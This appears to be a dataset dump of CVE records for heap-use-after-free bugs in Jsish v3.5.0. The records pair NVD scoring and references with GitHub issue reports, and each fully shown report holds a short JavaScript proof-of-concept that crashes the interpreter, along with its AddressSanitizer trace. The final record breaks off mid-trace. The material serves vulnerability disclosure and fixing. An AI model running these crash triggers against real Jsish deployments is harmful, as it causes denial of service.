CVE-2021-46495 | 2022-01-27T21:15:08.827 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via DeleteTreeValue in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/82"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/82"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/82 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest() {
var buf = setInterval(function () {
ws.send('0');
}, 40)(update(Object(0)));
}
try {
JSEtest();
} catch (e) {
setInterval(Function.prototype, 40);
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==66060==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001f0 at pc 0x56055c54b6fc bp 0x7ffc737457e0 sp 0x7ffc737457d0
READ of size 4 at 0x6030000001f0 thread T0
#0 0x56055c54b6fb in DeleteTreeValue src/jsiObj.c:176
#1 0x56055c563384 in Jsi_TreeEntryDelete src/jsiTree.c:636
#2 0x56055c564f10 in destroy_node src/jsiTree.c:496
#3 0x56055c564f10 in destroy_node src/jsiTree.c:494
#4 0x56055c564f10 in Jsi_TreeDelete src/jsiTree.c:515
#5 0x56055c54d9df in Jsi_ObjFree src/jsiObj.c:348
#6 0x56055c54ea0f in Jsi_ObjDecrRefCount src/jsiObj.c:440
#7 0x56055c3fd3d1 in ValueFree src/jsiValue.c:178
#8 0x56055c3fd3d1 in Jsi_ValueFree src/jsiValue.c:199
#9 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52
#10 0x56055c50d4d4 in Jsi_EventFree src/jsiCmds.c:204
#11 0x56055c4234e2 in freeEventTbl src/jsiInterp.c:570
#12 0x56055c4c58dd in Jsi_HashClear src/jsiHash.c:507
#13 0x56055c4c5cd7 in Jsi_HashDelete src/jsiHash.c:526
#14 0x56055c43687c in jsiInterpDelete src/jsiInterp.c:1936
#15 0x56055cc4d047 in jsi_main src/main.c:49
#16 0x7f78b6c29bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#17 0x56055c3dc969 in _start (/usr/local/bin/jsish+0xe8969)
0x6030000001f0 is located 0 bytes inside of 32-byte region [0x6030000001f0,0x603000000210)
freed by thread T0 here:
#0 0x7f78b78987a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7f78b7898d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x56055c44daa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue
Shadow bytes around the buggy address:
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa
0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
=>0x0c067fff8030: fa fa fd fd fd fd fa fa fd fd fd fd fa fa[fd]fd
0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==66060==ABORTING
``` | Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue | https://api.github.com/repos/pcmacdon/jsish/issues/82/comments | 0 | 2021-12-24T10:48:59Z | 2021-12-28T02:31:29Z | https://github.com/pcmacdon/jsish/issues/82 | 1,088,311,523 | 82 | 3,121 |
CVE-2021-46496 | 2022-01-27T21:15:08.870 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_ObjFree in src/jsiObj.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/83"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/83"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/83 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var __instance = Object;
__instance.exec = RegExp;
try {
$ERROR('Error' + (__instance.exec("1")));
} catch (e) {
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==22083==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000127e8 at pc 0x5569eb9fb061 bp 0x7ffdf3af1950 sp 0x7ffdf3af1940
READ of size 4 at 0x6080000127e8 thread T0
#0 0x5569eb9fb060 in Jsi_ObjFree src/jsiObj.c:339
#1 0x5569eb8e3aa0 in jsiInterpDelete src/jsiInterp.c:1943
#2 0x5569ec0fa047 in jsi_main src/main.c:49
#3 0x7f90875e2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#4 0x5569eb889969 in _start (/usr/local/bin/jsish+0xe8969)
0x6080000127e8 is located 72 bytes inside of 96-byte region [0x6080000127a0,0x608000012800)
freed by thread T0 here:
#0 0x7f90882517a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x5569eb8cf073 in regExpFree src/jsiInterp.c:588
previously allocated by thread T0 here:
#0 0x7f9088251d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x5569eb8faaa4 in Jsi_Calloc src/jsiUtils.c:57
#2 0x5569ec1a6faf (/usr/local/bin/jsish+0xa05faf)
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:339 in Jsi_ObjFree
Shadow bytes around the buggy address:
0x0c107fffa4a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa4b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa4c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa4d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa4e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x0c107fffa4f0: fa fa fa fa fd fd fd fd fd fd fd fd fd[fd]fd fd
0x0c107fffa500: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fffa530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fffa540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22083==ABORTING
```
| MEMLEAK NOW: Heap-use-after-free src/jsiObj.c:339 in Jsi_ObjFree | https://api.github.com/repos/pcmacdon/jsish/issues/83/comments | 2 | 2021-12-24T10:49:33Z | 2021-12-28T02:31:03Z | https://github.com/pcmacdon/jsish/issues/83 | 1,088,311,780 | 83 | 3,122 |
CVE-2021-46497 | 2022-01-27T21:15:08.917 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_UserObjDelete in src/jsiUserObj.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/84"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/84"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/84 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
try {
WebSocket(new Object());
} catch (e) {
}
try {
(Number)('wrong');
} catch (e) {
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==116852==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000220 at pc 0x56117e352348 bp 0x7ffdd456fd30 sp 0x7ffdd456fd20
READ of size 4 at 0x608000000220 thread T0
#0 0x56117e352347 in jsi_UserObjDelete src/jsiUserObj.c:32
#1 0x56117e1a9a28 in freeUserdataTbl src/jsiInterp.c:660
#2 0x56117e24d8dd in Jsi_HashClear src/jsiHash.c:507
#3 0x56117e24dcd7 in Jsi_HashDelete src/jsiHash.c:526
#4 0x56117e1be7d8 in jsiInterpDelete src/jsiInterp.c:1935
#5 0x56117e9d5047 in jsi_main src/main.c:49
#6 0x7f876ebfebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#7 0x56117e164969 in _start (/usr/local/bin/jsish+0xe8969)
0x608000000220 is located 0 bytes inside of 96-byte region [0x608000000220,0x608000000280)
freed by thread T0 here:
#0 0x7f876f86d7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x56117e2d6a0f in Jsi_ObjDecrRefCount src/jsiObj.c:440
previously allocated by thread T0 here:
#0 0x7f876f86dd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x56117e1d5aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete
Shadow bytes around the buggy address:
0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff8000: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8020: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c107fff8040: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8050: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8060: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8070: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fff8080: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==116852==ABORTING
```
| Heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete | https://api.github.com/repos/pcmacdon/jsish/issues/84/comments | 0 | 2021-12-24T10:50:28Z | 2021-12-27T16:51:37Z | https://github.com/pcmacdon/jsish/issues/84 | 1,088,312,235 | 84 | 3,123 |
CVE-2021-46498 | 2022-01-27T21:15:08.957 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/81"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/81"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/81 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
console.printf= (new WebSocket);
setTimeout(console, 100000);
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210
READ of size 4 at 0x61b000000080 thread T0
#0 0x55b167ed6de5 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3190
#1 0x55b167e7ba2d in jsi_UserObjFree src/jsiUserObj.c:75
#2 0x55b167dfeefb in Jsi_ObjFree src/jsiObj.c:334
#3 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440
#4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
#5 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199
#6 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52
#7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177
#8 0x55b167e14384 in Jsi_TreeEntryDelete src/jsiTree.c:636
#9 0x55b167e15f10 in destroy_node src/jsiTree.c:496
#10 0x55b167e15f10 in destroy_node src/jsiTree.c:494
#11 0x55b167e15f10 in Jsi_TreeDelete src/jsiTree.c:515
#12 0x55b167dfe9df in Jsi_ObjFree src/jsiObj.c:348
#13 0x55b167dffa0f in Jsi_ObjDecrRefCount src/jsiObj.c:440
#14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
#15 0x55b167cae3d1 in Jsi_ValueFree src/jsiValue.c:199
#16 0x55b167cae6cf in Jsi_DecrRefCount src/jsiValue.c:52
#17 0x55b167dbe4d4 in Jsi_EventFree src/jsiCmds.c:204
#18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570
#19 0x55b167d768dd in Jsi_HashClear src/jsiHash.c:507
#20 0x55b167d76cd7 in Jsi_HashDelete src/jsiHash.c:526
#21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936
#22 0x55b1684fe047 in jsi_main src/main.c:49
#23 0x7f5c2d555bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#24 0x55b167c8d969 in _start (/usr/local/bin/jsish+0xe8969)
0x61b000000080 is located 0 bytes inside of 1656-byte region [0x61b000000080,0x61b0000006f8)
freed by thread T0 here:
#0 0x7f5c2e1c47a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x55b167ed6d22 in jsi_wswebsocketObjFree src/jsiWebSocket.c:3199
previously allocated by thread T0 here:
#0 0x7f5c2e1c4d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55b167cfeaa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree
Shadow bytes around the buggy address:
0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fff8010:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree | https://api.github.com/repos/pcmacdon/jsish/issues/81/comments | 0 | 2021-12-24T10:48:23Z | 2021-12-28T02:31:29Z | https://github.com/pcmacdon/jsish/issues/81 | 1,088,311,213 | 81 | 3,124 |
CVE-2021-46499 | 2022-01-27T21:15:09.003 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueCopyMove in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/76"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/76"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/76 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest(){}
var arr = /x?y?z?/.exec("abcd");
arr[arr[1000] = 3](arr.every(JSEtest), arr[1000] = 3, '1')
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==99189==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000006e84 at pc 0x5637792b29cd bp 0x7ffef5f97e60 sp 0x7ffef5f97e50
READ of size 4 at 0x603000006e84 thread T0
#0 0x5637792b29cc in jsi_ValueCopyMove src/jsiValue.c:245
#1 0x5637792b29cc in Jsi_ValueCopy src/jsiValue.c:301
#2 0x5637795f6759 in jsi_ObjArraySetDup src/jsiEval.c:1054
#3 0x5637795f6759 in jsi_ValueObjKeyAssign src/jsiEval.c:1079
#4 0x5637795f6759 in jsiEvalCodeSub src/jsiEval.c:1303
#5 0x5637795fd15e in jsi_evalcode src/jsiEval.c:2204
#6 0x563779601274 in jsi_evalStrFile src/jsiEval.c:2665
#7 0x5637792f066a in Jsi_Main src/jsiInterp.c:936
